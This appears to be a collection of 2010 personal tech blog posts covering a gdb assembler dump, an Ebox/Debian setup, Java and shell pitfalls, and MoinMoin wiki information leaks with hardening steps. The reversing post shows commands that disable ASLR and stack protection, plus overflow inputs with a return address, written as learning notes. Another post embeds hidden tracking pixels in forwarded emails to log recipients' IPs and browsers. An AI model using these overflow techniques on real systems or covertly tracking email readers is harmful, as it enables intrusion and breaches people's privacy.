0x080486ac <main+472>:  jmp    0x804877c <main+680>
0x080486b1 <main+477>:  mov    0x8049aac,%eax
0x080486b6 <main+482>:  mov    %eax,0x4(%esp)
0x080486ba <main+486>:  mov    0x8049ab4,%eax
0x080486bf <main+491>:  add    0x8049aa0,%eax
0x080486c5 <main+497>:  mov    %eax,(%esp)
0x080486c8 <main+500>:  call   0x8048484 <vacia>
0x080486cd <main+505>:  mov    %eax,0x8049aa0
0x080486d2 <main+510>:  movl   $0x0,0x8049aa4
0x080486dc <main+520>:  movl   $0x8049a40,(%esp)
0x080486e3 <main+527>:  call   0x8048358 <strlen@plt>
0x080486e8 <main+532>:  cmp    %eax,0x8049aa4
0x080486ee <main+538>:  jb     0x80486f2 <main+542>
0x080486f0 <main+540>:  jmp    0x8048719 <main+581>
0x080486f2 <main+542>:  mov    0x8049aa4,%eax
0x080486f7 <main+547>:  add    $0x8049a40,%eax
0x080486fc <main+552>:  mov    0x8049b74,%edx
0x08048702 <main+558>:  add    $0x8049ac0,%edx
0x08048708 <main+564>:  movzbl (%eax),%eax
0x0804870b <main+567>:  cmp    (%edx),%al
0x0804870d <main+569>:  jne    0x8048711 <main+573>
0x0804870f <main+571>:  jmp    0x8048719 <main+581>
0x08048711 <main+573>:  incl   0x8049aa4
0x08048717 <main+579>:  jmp    0x80486dc <main+520>
0x08048719 <main+581>:  mov    0x8049aa0,%ebx
0x0804871f <main+587>:  add    $0x8049b20,%ebx
0x08048725 <main+593>:  mov    0x8049aa8,%eax
0x0804872a <main+598>:  add    0x8049aa4,%eax
0x08048730 <main+604>:  mov    %eax,%ecx
0x08048732 <main+606>:  add    0x8049b70,%ecx
0x08048738 <main+612>:  mov    $0x84210843,%eax
0x0804873d <main+617>:  imul   %ecx
0x0804873f <main+619>:  lea    (%edx,%ecx,1),%eax
0x08048742 <main+622>:  mov    %eax,%edx
0x08048744 <main+624>:  sar    $0x5,%edx
0x08048747 <main+627>:  mov    %ecx,%eax
0x08048749 <main+629>:  sar    $0x1f,%eax
0x0804874c <main+632>:  sub    %eax,%edx
0x0804874e <main+634>:  mov    %edx,%eax
0x08048750 <main+636>:  shl    $0x5,%eax
0x08048753 <main+639>:  sub    %edx,%eax
0x08048755 <main+641>:  add    %eax,%eax
0x08048757 <main+643>:  sub    %eax,%ecx
0x08048759 <main+645>:  mov    %ecx,%eax
0x0804875b <main+647>:  movzbl 0x8049a40(%eax),%eax
0x08048762 <main+654>:  mov    %al,(%ebx)
0x08048764 <main+656>:  incl   0x8049b74
0x0804876a <main+662>:  addl   $0x5,0x8049b70
0x08048771 <main+669>:  incl   0x8049b10
0x08048777 <main+675>:  jmp    0x804869f <main+459>
0x0804877c <main+680>:  mov    0x8049aac,%eax
0x08048781 <main+685>:  add    $0x8049b21,%eax
0x08048786 <main+690>:  movb   $0x0,(%eax)
0x08048789 <main+693>:  movl   $0x8049b20,0x4(%esp)
0x08048791 <main+701>:  movl   $0x80488ee,(%esp)
0x08048798 <main+708>:  call   0x8048378 <printf@plt>
0x0804879d <main+713>:  movl   $0x0,0xfffffff4(%ebp)
0x080487a4 <main+720>:  jmp    0x80487a6 <main+722>
0x080487a6 <main+722>:  mov    0xfffffff4(%ebp),%eax
0x080487a9 <main+725>:  mov    0xfffffffc(%ebp),%ebx
0x080487ac <main+728>:  leave  
0x080487ad <main+729>:  ret    
End of assembler dump.
Dump of assembler code for function vacia:
0x08048484 <vacia+0>:   push   %ebp
0x08048485 <vacia+1>:   mov    %esp,%ebp
0x08048487 <vacia+3>:   sub    $0xc,%esp
0x0804848a <vacia+6>:   mov    0x8(%ebp),%eax
0x0804848d <vacia+9>:   cmp    0xc(%ebp),%eax
0x08048490 <vacia+12>:  jle    0x804849e <vacia+26>
0x08048492 <vacia+14>:  mov    0xc(%ebp),%edx
0x08048495 <vacia+17>:  mov    0x8(%ebp),%eax
0x08048498 <vacia+20>:  sub    %edx,%eax
0x0804849a <vacia+22>:  dec    %eax
0x0804849b <vacia+23>:  mov    %eax,0x8(%ebp)
0x0804849e <vacia+26>:  mov    0x8(%ebp),%eax
0x080484a1 <vacia+29>:  add    $0x8049b20,%eax
0x080484a6 <vacia+34>:  cmpb   $0x30,(%eax)
0x080484a9 <vacia+37>:  jne    0x80484b3 <vacia+47>
0x080484ab <vacia+39>:  mov    0x8(%ebp),%eax
0x080484ae <vacia+42>:  mov    %eax,0xfffffffc(%ebp)
0x080484b1 <vacia+45>:  jmp    0x80484cf <vacia+75>
0x080484b3 <vacia+47>:  mov    0xc(%ebp),%eax
0x080484b6 <vacia+50>:  mov    %eax,0x4(%esp)
0x080484ba <vacia+54>:  mov    0x8(%ebp),%eax
0x080484bd <vacia+57>:  inc    %eax
0x080484be <vacia+58>:  mov    %eax,(%esp)
0x080484c1 <vacia+61>:  call   0x8048484 <vacia>
0x080484c6 <vacia+66>:  mov    %eax,0x8(%ebp)
0x080484c9 <vacia+69>:  mov    0x8(%ebp),%eax
0x080484cc <vacia+72>:  mov    %eax,0xfffffffc(%ebp)
0x080484cf <vacia+75>:  mov    0xfffffffc(%ebp),%eax
0x080484d2 <vacia+78>:  leave  
0x080484d3 <vacia+79>:  ret    
End of assembler dump.

Interesting Links

ebox 4300

2010-11-27T21:23:00.002-05:00

On a certain day a friend* of mine showed me a smaller-than-a-tinny-tupperware box and claimed It was a fully functional PC!

Description

In order to believe him I bought this little piece of hardware which is the "server" you were connecting right when visiting the old wiki.eslimasec.com site.

As you can see I its so small and its based on a non-mobile-parts design:

No hardrive (its optional).
No noisy fan.
Compact flash bay (card not included).
Video card, 3 usb ports, 1 ps2 port
Ethernet port and wifi (optional)
Via Eden 500 Mhz & 512 MB RAM (included!!:)

Installing Debian

So as you might guess you can run linux in a compact flash card. I chose Debian, among the possible installing options I took a netinstall one based on a booting pendrive. In order to achieve this you can follow this howto: http://www.debian.org/releases/etch/i386/ch04s04.html.en following the steps from chapter 4.4.2. to 4.4.4.

The problems you might get are that when booting the pendrive It might not detect your Compact Flash Card reader and the card inside. I managed it to work by using the following files in the root of an already partitioned fat16 pendrive:

initrd.gz
ldlinux.sys
mini.iso
syslinux.cfg
vmlinuz

You can get all these files I used in the following compressed file Ebox4300_Deb_netinst_files.rar . Don't forget running syslinux command as the howto suggests!

With all said you can get your compact flash card recognized by the system and proceed to install Debian on it

Tweaking for performance

After the installation I applied the following tweaks to improve the performance having in mind that this machine's physical drive is just a compact flash memory and therefore does not have the i/o capacity of a traditional hard drive.

Edit file /boot/grub/menu.lst as follows (elevator parameter for the kernel being started at boot time)

...
title           Debian GNU/Linux, kernel 2.6.18-6-686
root            (hd0,1)
kernel          /boot/vmlinuz-2.6.18-6-686 root=/dev/hdc2 ro vga=791 '''elevator=noop'''
initrd          /boot/initrd.img-2.6.18-6-686
...

Edit the file /etc/fstab, and instruct debian to mount /tmp and /var/tmp files in RAM memory. Some howtos recommend /var/log as well but then all the logs generated wont be kept after a reboot (hmm I would ask tmpfs developpers that maybe would be a good idea to allow changes to be written to permanent storage when poweroff or reboot is issued. Observe the noatime option as well that will prevent debian to change file access time everytime a file is accessed (maybe in a forensic scenario this is not good, but in my case hopefully no "crime" is committed here!!)

# /etc/fstab: static file system information.
#
# <file system> <mount point>   <type>  <options>       <dump>  <pass>
proc            /proc           proc    defaults        0       0
/dev/hdc2       /               ext2    noatime,errors=remount-ro 0       1
#/dev/hdc1       none            swap    sw              0       0
tmpfs           /tmp            tmpfs   defaults           0    0
tmpfs           /var/tmp        tmpfs   defaults           0    0

As you can see I also commented the line that mounts the swap partition as I dont want it neither for the sake of the overall system performance as swap is mapped to the compact flash in this machine.

Where to get it

You can get this stuff or other interesting stuff under Norhtec's web page http://www.norhtec.com. The name they give to this machines is MicroClient Sr http://www.norhtec.com/products/mcsr/index.html but I guess the genuine name is Ebox 4300. You can find this unit as it is (without hard drive or wifi) from 200$ (excluding shipping costs) but you can customize it with addons. The support from Norhtec company was great and we don't have any troubles in the shipping. By they are Thailand based so don't mislead the name with a North American company.

Some fun

psp-ssh allows you to run a ssh client on your PSP!

I grabbed [http://zx81.zx81.free.fr/serendipity/index.php?/categories/34-SSH-Client this version] for my PSP (It may differ on you PSP firmware version,so read the psp-ssh documentation)

Next drop the folder in the following dir (windows based)

<psp_drive_unit>:\PSP\GAME380\pspssh

One important thing version 380 does not work without static ip wireless configuration...don't ask me why.

You will have to generate a random number. With the start button a keyboard will appear

The result

Interesting Links

I found is this post from Nicolas314 regarding the former ebox 2300 but I think some things might be valid http://nicolas314.wordpress.com/norhtec-microclient-jr/
An extensive review of the ebox 4300 from Eric House where he discuss howto take advance of the internal video processor for multimedia use http://www.linuxdevices.com/articles/AT4708024578.html
DioNiSio project page, developed by Ger http://kung-foo.dhs.org/dionisio/

Java Nightmares

2010-11-27T21:21:00.001-05:00

Objective: SOS with Java silly-but-wasting-time coding errors

Contents

Java Nightmares
1. Objective: SOS with Java silly-but-wasting-time coding errors
2. Links

My code read two lines at a time?

Noope...sometimes you will get astonished about your System.in.read() in a small code that readlines from file, for example:

import java.io.*;
class FileRead 
{
   public static void main(String args[])
  {
      try{
  
    FileInputStream fstream = new FileInputStream("textfile.txt");
 
    DataInputStream in = new DataInputStream(fstream);
        BufferedReader br = new BufferedReader(new InputStreamReader(in));
    String strLine;
   
    while ((strLine = br.readLine()) != null)   {
     
      System.out.println (strLine);
***      System.in.read();****
    }
       in.close();
    }catch (Exception e){//Catch exception if any
      System.err.println("Error: " + e.getMessage());
    }
  }
}

This code will show two lines at a time as It will get the trailing line feed from the previous System.out.println(strLine) and won't wait for your desired enter key press...silly huh

String comparison

Forget "==" or "!=" as they won't be reported as errors but won't work for comparing strings (its ascii content), the java way is

if (string1.equals(string2))
if (string1.compareTo(string2) < 0)
if (string1.equalsIgnoreCase(string2))

Show icon embedded into jar file working in eclipse and in your executable file

For some reason I wasn't able to clearly identify, java or eclipse likes to complicate things when you want to show images that you want to pack in to your program jar file.

If you put the icon you want to display in your main frame in you "./images/" path into your eclipse working directory eclipse will say ok everything alright when you press the "Run" button. This would be the code:

myFrame.setIconImage(myFrame.getToolkit().getImage("images/no_more.PNG"));

Then when you decide to create your jar file (File/Export/Runnable Jar file) that you expect to run like in the Eclipse IDE... NOOOOOPE! the resulting file will NOT have the images directory embedded... this is something I hated as I wanted a unique portable jar with all files/resources packend inside.

You think about possible workarounds and you read about other functions like specifying paths like URLs?? ok lets try

URL imgURL = getClass().getResource("images/no_more.PNG");
myFrame.setIconImage(myFrame.getToolkit().getImage(imgURL));

}}} OUCH...Eclipse error the getClass wants a class/package or something that looks like it, so the dirty thing i dit was creating a jar file containing my desired PNG file inside a images folder and add it to the project in the menu "Project/Properties/Java Build Path/Libraries/Add Jars". Ok now eclipse does not complain.

The thing is in your exported jar file check that you PNG file is in the appropriate folder that match to the "getResource" function invocation you did in the code and it should work

If anyone has a hint into making this more straightforward please let me know!

Compiling, jaring, splash screen and MANIFEST.MF file

To compile just use

javac program.java

The MANIFEST.MF describes a jar itself and must for instance define the main class to execute. Here I present the manifest file from the well known webscarab http proxy

Manifest-Version: 1.0
Ant-Version: Apache Ant 1.6.5
Created-By: 1.5.0_06-b05 (Sun Microsystems Inc.)
Main-Class: org.owasp.webscarab.WebScarab
Built-By: rdawes
Class-Path: lib/concurrent.jar lib/htmlparser.jar lib/bsh-2.0b1.jar li
 b/jfreechart-0.9.12.jar lib/jcommon-0.8.7.jar lib/bsf-2.3.0.jar lib/j
 hall-2.0_02.jar lib/chardet.jar lib/tagsoup-1.0rc2.jar lib/wsdl4j.jar
  lib/openamf.jar lib/commons-logging-1.0.4.jar

Name: org/owasp/webscarab/
Implementation-Title: org.owasp.webscarab
Implementation-Vendor: OWASP Foundation.
Implementation-Version: 20070504-1631

In my case I wanted to add a nice/fast-to-include splash screen. In order to do so you don't need to code anything It can be done automatically if you specify so in the manifest file like this. (warning be very careful with file types, "PNG" != "png" for java so in the images file the same case sensitive file must exists)

Manifest-Version: 1.0
Class-Path: .
Created-By: 1.6.0_14 (Sun Microsystems Inc.)
SplashScreen-Image: images/no_more_splash.PNG
Main-Class: NoMore

To jar some classes and add some images to the jar file once the manifest file is customize just use

jar cmf MANIFEST.MF output_file.jar program_classes.class images/*

For executing issue the following command

java -jar output_file.jar

Why a public python-moinmoin Wiki is not so good idea?

2010-11-27T21:20:00.001-05:00

Hallo out there! in this post I'm going to discuss why setting up a Internet facing wiki based on MoinMoin isn't a great idea in terms of security. I'm referring in this issue about the specific wiki that you can deploy from aptitude in a stable debian version by means of this command:

apt-get install python-moinmoin

Thus the version in which I disvered the facts (hacks) is python-moinmoin_1.5.3-1.2

Wait a moment dude isn't this a MoinMoin wiki?? yes but don't tell anyone =)..anyway I am also providing some counter-hacks tips which maybe are not enough =( ...I like risks

The hacks

Here you can find some dirty stuff I have come up you can do against a freshly installed python-MoinMoin wiki:

After a normal install install with apt the default behaviour is allowing the creation of new users. So if you thought that an ACL restricting non authenticated users the edition of pages that is not enough.
The great wiki will answer to the user whether a user or password is wrong or not
There is one functionality available by default that allows the user to render a page as an XML document (DocBook) which fails if you didn't install py-XML module (which is not installed as a python-moinmoin dependency). The debug information of this failure contains information like this

* Date: Mon, 15 Dec 2008 22:36:58 +0000
    * Platform: Linux gnomo 2.6.18-6-xen-686 #1 SMP Thu May 8 11:28:36 UTC 2008 i686
    * Python: Python 2.4.1 (/usr/bin/python)
    * MoinMoin: Release 1.8.0 (release)

you can access this failing facility by seleccing the "render as docbook" action or directly quering:

http://<www.site.com>/HelpContents?action=format&mimetype=xml/docbook

Some other residual help stuff installed by default can lead to internal information disclosure like the SystemInformation page

The counter hacks

Now I tell you some advices so that your wiki is a bit more secure...remember there is never 100% security as it finally depends on the human being

Disable the creation of additional users: the trip that worked for me is the inception of a new custom module that gets called when the action of creating a user is invoked. Therefore you will edit a new file <path_to_your_wiki>/data/plugin/action/userform.py

from MoinMoin.Page import Page
from MoinMoin import wikiaction

def execute(pagename, request):
        if 'create' in request.form:
                return Page(request, pagename).send_page(request, msg="Creating user accounts disabled.")

        wikiaction.do_userform(pagename, request)

Edit this file after creating your desired users!!

Remove the "help" and informational residual content that is stored udner /path_to_your_wiki/underlay/pages :
- SystemInfo
- helpon*blablablah
- DesktopEdition
- WikiCourse
Disable some actions that can lead to information disclosure or resources consumption by crafting this array in you /etc/moin/yourwiki.py file:

actions_excluded=['newaccount','RenderAsDocbook','SpellCheck','PackagePages']

Apart from this the "RenderAsDocbook" action will be still enable when accessing the url directly so you will have to fine tune at Apache configuration with something like this:

<Location /esliwiki/HelpContents>
    order allow,deny
    deny from all
</Location>

Then all the users trying to reach that page and all that are supposed to be Help related will receive a 404 Forbidden page .

Adding ClustrMaps to your page footer (python-moinmoin 1.5 versions)

This is not hardening related but I will place it here. My MoinMoin wiki didn't care about me using the page_footer2 tag in the main configuration file (this should be farmconfig in etc file or you own MoinMoin config file). Thus I did this tweak which is locating where credits are (/var/lib/python-support/python2.5/MoinMoin/multiconfig.py) and fixing the thing like this if you want the map to appear before the credits information:

page_credits = [
        '<div align="center"><a href="http://www2.clustrmaps.com/counter/maps.php?url=http://eslimasec.com" id="clustrMapsLink"><img src="http://www2.clustrmaps.com/counter/index2.php?url=http://eslimasec.com" style="border:0px;" alt="Locations of visitors to this page" title="Locations of visitors to this page" id="clustrMapsImg" onerror="this.onerror=null; this.src=\'http://clustrmaps.com/images/clustrmaps-back-soon.jpg\'; document.getElementById(\'clustrMapsLink\').href=\'http://clustrmaps.com\';" /></a></div><br>',
        '<a href="http://moinmoin.wikiwikiweb.de/">MoinMoin Powered</a>',
        '<a href="http://www.python.org/">Python Powered</a>',
        '<a href="http://validator.w3.org/check?uri=referer">Valid HTML 4.01</a>',
        ]

Adding ClustrMaps to your page footer (python-moinmoin 1.7 versions)

This is easier as you can use page_footer2 tag in your main standalone or farm wiki config file like this:

page_footer2 = '<div align="center"><a href="http://www2.clustrmaps.com/counter/maps.php?url=http://eslimasec.com" id="clustrMapsLink"><img src="http://www2.clustrmaps.com/counter/index2.php?url=http://eslimasec.com" style="border:0px;" alt="Locations of visitors to this page" title="Locations of visitors to this page" id="clustrMapsImg" onerror="this.onerror=null; this.src=\'http://clustrmaps.com/images/clustrmaps-back-soon.jpg\'; document.getElementById(\'clustrMapsLink\').href=\'http://clustrmapsbr>'

Reversing Scratch Book

2010-11-27T21:19:00.001-05:00

Contents

Reversing Scratch Book

Introduction

This post will be a scratch book to support my learning of the roots of computers: machine code, assembler, exploits, etc.

It will be quite messy as it's going to be based on mistakes I commit and things I find interesting to have in mind but maybe you can find anything that suits for you.

Things to note

SIZES

IA32 architechture:

Element	Size	Sample	Description
Address	4 bytes	0xffffe000	Memory address that in this case corresponds to the linux-gate.so static shared module
Opcode	1-2 bytes	FFE4	In this case it corresponds to JMP *%ESP instruction used to circumvent random address stack
RET	4 bytes	0xddccbbaa	As RET is the address of the returning function it is an address as well so it takes 4 bytes
EBP	4 bytes	0xddccbbaa	Stack frame pointer, as again its an address it occupies 4 bytes
AH	1 byte	N/A	Register's high part of memory
AL	1 byte	N/A	Register's low part of memory
AX	2 bytes	N/A	16 bit space formed by AH+AL
EAX	4 bytes	N/A	Extended AX register able to hold an address

GCC

Compile so that you can see the source code when debugging (gdb is most effective when it is debugging a program that has debugging symbols linked in to it. With g++, this is accomplished using the -g command line argument. For even more information, the -ggdb switch can be used which includes debugging symbols which are specific to gdb. The makefile for this tutorial uses the -ggdb switch. )

gcc -ggdb -o tesoro tesoro.c

GDB

List code (if possible)

Examine

x/FMT ADDRESS
x/x <address> #examine address position and display hex content
x/c <address> #examines address position and display the byte stored in that position translated to ascii

Show functions of a binary

info functions

show variables, print the names and data types of all variables that are declared outside of functions (i.e. excluding local variables).

info variables

* specify running arguments

set args

Set breakpoint

break <function>
brak *<line_num>

Diverting output to file

Change the name of the current logfile. The default logfile is gdb.txt.

set logging file FILE

Patching a program

By default, GDB opens the file containing your program's executable code (or the corefile) read-only. This prevents accidental alterations to machine code; but it also prevents you from intentionally patching your program's binary.

If you'd like to be able to patch the binary, you can specify that explicitly with the set write command. For example, you might want to turn on internal debugging flags, or even to make emergency repairs.

set write on
set write off

If you specify set write on', GDB opens executable and core files for both reading and writing; if you specify set write off' (the default), GDB opens them read-only. If you have already loaded a file, you must load it again (using the exec-file or core-file command) after changing set write, for your new setting to take effect.

show write

Display whether executable files and core files are opened for writing as well as reading.

Differences between Intel & AT&T Syntax

Intel and AT&T syntax Assembly language are very different from each other in appearance, and this will lead to confusion when one first comes across AT&T syntax after having learnt Intel syntax first, or vice versa. So lets start with the basics.

In Intel syntax there are no register prefixes or immed prefixes. In AT&T however registers are prefixed with a '%' and immed's are prefixed with a '$'. Intel syntax hexadecimal or binary immed data are suffixed with 'h' and 'b' respectively. Also if the first hexadecimal digit is a letter then the value is prefixed by a '0'.

Example:

Intex Syntax

mov     eax,1
mov     ebx,0ffh
int     80h

AT&T Syntax

movl    $1,%eax
movl    $0xff,%ebx
int     $0x80

As you may have noticed, the AT&T syntax mnemonics have a suffix. The significance of this suffix is that of operand size. 'l' is for long, 'w' is for word, and 'b' is for byte. Intel syntax has similar directives for use with memory operands, i.e. byte ptr, word ptr, dword ptr. "dword" of course corresponding to "long". This is similar to type casting in C but it doesnt seem to be necessary since the size of registers used is the assumed datatype.

Moving data to registers

when coding something like:

mov ax,4

its possible that the high part of eax is polluted from previous actions and you don't get the results you wanted, thus better use:

mov eax,4

xor eax,eax
mov ax,4

Compiling,liking..executing (linux)

ASM code -> machine code

nasm -f elf <program.s>

machine code -(linker)-> executable binary

gcc <program.o> -o <program>

executing

./<program>

Standard input, output...

stdout=screen=1
stdin=keyboard=0

Syscalls

They are invoked by an interruption and require some parameters that are provided in the registers (eax,ebx,etc).

SYSCALL #	action
4	write
5	read

For reference, system call numbers can be found in /usr/include/asm/unistd.h.

Compare numbers sample

Read two numbers and say which one is bigger

Stack address randomization

Ways to check whether it is enabled or not (Debian like)

#cat /proc/sys/kernel/randomize_va_space
/* or  */
#sysctl kernel.randomize_va_space

To disable it

echo 0 > /proc/sys/kernel/randomize_va_space
/*  or   */
sysctl -w kernel.randomize_va_space=0

Stack execution prevention

Stack execution prevention deactivates the stack addresses as executable. Thus EIP cannot point to an address considered as stack space. It is disabled at compilation time with

$ gcc -fno-stack-protector -z execstack vulnerable.c

-fno-stack-protector disables SSP (stack guard) -z execstack marks the stack as executable

Filling the stack

The genuine-oldskool:

./victim `perl -e "print 'a'x256"`
Segmentation fault

./victim $(printf "%0512x")
Segmentation fault

from inside gdb

(gdb) run `perl -e 'print "a"x516,"\xa8\xf5\xff\xbf"'`

I (L) Coredumps

#ulimit -c unlimited
# ./victim $(printf "%0512x")
Segmentation fault (core dumped)
#gdb -c core

Understanding GDB errors

After inserting a seemingly correct breakpoint you get this error when starting your debugged program

Cannot insert Breakpoint N.
Error accessing memory address XXXXXX: input/output error.

This will be probably caused because the address you specified as breakpoint does not match with the beginning of an instruction.

ShellScript Nightmares

2010-11-27T21:15:00.001-05:00

Objective: SOS with "Hell" scripting ;)

This post is a scratch book to collect some tips about shell script programming that have caused me some silly headaches since I started using Linux and Its useful shell scripting features

Contents

ShellScript Nightmares
1. Objective: SOS with "Hell" scripting

Debugging

When you are in trouble maybe this can help and provide you better debugging info than when running your shell script normally

sh -x shellscript.sh

IFS

IFS is a system var that defines what is considered the field separator in a list when being parsed by a loop. If you don't define it properly you won't get the desired results.This

for i in `cat /etc/services`; do echo $i; done

is not the same as this

IFS=$'\n';for i in `cat /etc/services`; do echo $i; done

So for god shake be very careful with the ' marks and the $ ...why this?? i took me enough time to discover this to research why, anyway Ill be graceful if you sent me an email in case you know

String assignment

As a good programmer or good-wannabe programmer you may want your code to be clean an readable, thus you may assign values something like this foo = 7. NOPE NOPE NOPE, your shell is not going to like it, it expects foo=7, this is no spaces in between

Conditionals

If clauses can be used like this:

if [ expression ]
then
    <actions_if_true>
else
    <actions_if_false>
fi
#or
[[ <expression> ]] && <actions_if_true> || <actions_if_false>
#or using the "test" clause

It is very important to respect the blank spaces between the brackets

In order to use double conditions, it should be

# expression1 and expression2 must be true
if [ expression1 -a expression2 ]
if [ expression1 ] && [ expression2 ]
# either expression1 or expression2 have to be true
if [ expression1 -o expression2 ]
if [ expression1 ] || [ expression2 ]

String comparison

After reading the last tip you would use string comparison inside conditional clauses like this:

if [ $foo="something" ]
...

NOOOOOOOOOOOOPE!! Shell scripting does not like it this way, you should separate it or It will understand you are just assigning. This should be correct:

if [ $foo = "something" ]
...

By the way take care with strings that contain blank spaces, in that case your comparison should look like:

if [ "$foo" = "something containing blank spaces" ]
...

Command output assignment

In the same way you assign a value to a variable you can assign the output of a function or external command, to do so you would use the following syntax:

foo=`cat /etc/services`

Bear in mind there shouldn't be any blank space surrounding the = sign

Number comparison

When you are comparing numbers in a conditional clause you must do it in the following way, this is, using -eq, -lt, -gt, etc.

if [ 1 -eq $i ]

Bear in mind there shouldn't be any blank space surrounding the = sign

Function return value

Shell script does not have "return" clause, therefore the first value you "echoed" inside a function is taken as the return value. Wait I didn't explain how to define a function:

function_A(){
sum=`expr $1 + $2`
echo "Im the return value:$sum"
}

param1=1
param2=2
echo `function_A $param1 $param2`

Keep an eye on the following things

The function declaration does not declare parameter types and therefore parentheses are always with no parameters inside
The parameters are accesses as $N where "N" is the number of the parameter ($1=param1,$2=param2)
In the function invocation the parameters are specified next to the function name without parenthesis.

Debugging help

When you have nested loops you want to stop things to see how the script is running, you can achieve this by using a "readline" stop that will be continued after you press the enter key:

...
read $foo
...

Floating point calculation

Believe it or not but you cannot use decimal numbers inside shell script, therefore you carry those decimal/floating point numbers contained in string variables and then you operate them with a command called bc. An example can be seen below:

function_A(){
sum=`echo "$1+$2"|bc`
echo "Im the return value:$sum"
}

param1=1.2
param2=2.8
echo `function_A $param1 $param2`

Strictly integer variables

Variables in Shellscript tend to be types-bisexual they can accept strings or numbers. In some conditional clauses we see that the shellscript parser is complaining about the types that should be equal. For this cases you can define an strictly int variable and assign it a number from a string variable that will be casted to integer.

max_hits=10
typeset -i hit=0
hit="4"
if [ $max_hits -lt $hit ]
...

Otherwise in the if clause we would see an "unary operation expected" exception.

Bash arrays

wow yeah! Bash shell do handle arrays, its usage is describe in the following examples

#instantiation example
array=(11 2 3 4 5 10 8)
#or
array[0]=0
#length
${#ports[*]}
#read form it, $i is a number
${ports[$i]}
#write to it, $i is a number
ports[$i]=7

Concurrent execution

Commands in a shellscript are executed in sequential order, this is command in line 4 won't be executed before command in line 3 is finished. If we wanted the script not to wait for certain commands or group or commands we use the & symbol.

The sequential execution 4 will appear before the execution 3 because the concurrent lines do not make the script wait for them

The dumb mail project

2010-11-27T21:13:00.001-05:00

WTF??

For ages I have tried to educate my friends and relatives about not spreading hoax mails and stuff like that and I astonishingly see that they keep on sending that sxxt! Instead of surrendering against it, I will just try to have some fun about it. My plan is doing the following:

forward those hoax and non hoax mails with a small tux pic hosted in a server I own.
Study the path and behaviour of that emails and people who are opening it.
take some conclusions, plot maps, etc...we will see.

Some results can be seen in the end of this post.

Requirements

What I used:

apache2
the gimp
a sub domain thedumpmail.eslimasec.com
an email account that we all have crowded of hoax and similar stuff

The pic

Edited tux image with gimp so that It's small.

$ file tux.gif
tux.gif: GIF image data, version 89a, 10 x 12

Apache2 configuration

Created a custom log in apache adequate for my needs:

referral: to try to see which email service are using the users
date and time
originatin ip
user agent: to see which web browsers are using the users

In the file /etc/apache2/apache2.conf we have some already-defined log formats

LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent

I added a new custom log format under the name dumbmail,I wanted the date to be yymmddhhmmss for tracing purposes

LogFormat "%{%y%m%d%H%M%S}t|%h|%r|%{Referer}i|%{User-agent}i" dumbmail

The brackets before the i variable are there because "%i" is an array containing information sent from the user browser, but I only need the user-agent and the referer field.

As I want to see how different types of emails are spreading into the net I needed an easy/automatic way of differentiate which connection received belongs to which mail. I solved this by creating a redirect, this is, an only tux.gif resource exists on my server but It will be accessed by different URLs that allow me to infer which email the users are reading.

I will copy the virtual host definition I created:

<VirtualHost *>
        ServerName thedumbmail.eslimasec.com
        DocumentRoot /var/www/thedumbmail
        CustomLog /var/log/dumbmail.log dumbmail
        RedirectMatch ^/test tux.gif
</VirtualHost>

By the way I dont want that file to be rotated so Ill take care my self of compressing or managing it in some way.As you can see when a request starting by test comes to my virtual host its redirected to tux.gif

Forwading the emails

finally I edited the mails in html mode adding the following

<IMG alt="" src="http://thedumbmail.eslimasec.com/test#.gif" >

where # is the test number I am sending. Each test corresponds to a certail email Im forwarding.

The resulting log file

The result in my log files are get request to the different test# urls Im forwarding in the emails. As you can see first they "touch" the test#.gif resource and are redirected to the tux.gif.

081129154722|85.54.133.25|GET /test3.gif HTTP/1.1|http://bl120w.blu120.mail.live.com/mail/InboxLight.aspx?n=443239984|Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)

081129154722|85.54.133.25|GET /tux.gif HTTP/1.1|http://bl120w.blu120.mail.live.com/mail/InboxLight.aspx?n=443239984|Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)

Apache offers some conditional login facility that will allow me log only the interesting connections which are those ones that refer to the test#. You only have to add the following to your virtualhost configuration

SetEnvIf Request_URI "tux.gif$" dontlog
        CustomLog /var/log/dumbmail.log dumbmail env=!dontlog

Exploiting the information

With the information gathered I am plotting a map that you can see in the following link. The numbers are ordered based on timestamp information: http://www.eslimasec.com/thedumbmail/dumbmap_test4.html

Back soon!!

2010-08-31T22:12:00.002-04:00

Don´t be so impatient...